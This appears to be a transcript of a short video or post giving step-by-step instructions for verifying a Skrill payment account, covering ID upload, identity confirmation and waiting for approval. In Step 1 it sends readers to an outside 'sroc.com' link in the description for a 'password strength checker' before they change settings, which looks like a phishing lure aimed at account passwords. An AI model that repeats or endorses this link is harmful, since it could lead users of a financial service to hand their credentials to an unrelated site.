I hit this issue today and here's the quick fix that solved it. If you're looking to verify your Skrill account, follow these simple steps to get it done quickly. Step 1. Log into your Skrill account. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to the verification section. Once logged in, go to the settings menu, usually found in the top right corner. From there, select verification to see what documents are needed. Step 3. Upload required documents. Prepare and upload the necessary documents, such as a government-issued ID and proof of address. Make sure the documents are clear and legible. Step 4. Confirm your identity. After uploading, Skrill may ask you to confirm your identity via a video call or additional questions. Follow the prompts carefully to complete this step. Quick gotcha, make sure your ID is not expired. An expired ID can delay the verification process. Step 5. Wait for approval. Once you've submitted everything, wait for Skrill to review your documents. This can take anywhere from a few minutes to a couple of days. Getting your Skrill account verified is straightforward if you follow these steps. Good luck and enjoy your seamless transactions.